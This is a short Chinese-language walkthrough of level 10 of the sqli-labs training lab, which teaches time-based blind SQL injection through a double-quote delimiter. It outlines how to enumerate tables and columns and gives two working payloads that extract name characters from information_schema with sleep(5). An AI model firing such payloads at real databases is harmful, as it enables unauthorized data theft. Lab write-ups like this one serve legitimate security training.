第 10 关是也基于时间的盲注,跟第 9 关一样,只不过单引号 ’ 变成了双引号 " 而已
思路大致如下:
count(*)得到表个数
--> 各个表长度
--> 猜测表名
count(*)得到列个数
--> 各个列长度
--> 猜测列名
得到数据的思路同上↑
这里提供几个正确的 payload :
得到第一张表的第一个字母:
http://sqlilabs/Less-10/?id=1" and if(ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))=101,sleep(5),0)--+
得到users表列的第一个字母:
http://sqlilabs/Less-9/?id=1" and if(ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name = 'users' limit 0,1),1,1))=105,sleep(5),0)--+
也可以像第 8 关那样编写脚本,思路一样的,只不过需要更换 payload 而已
😄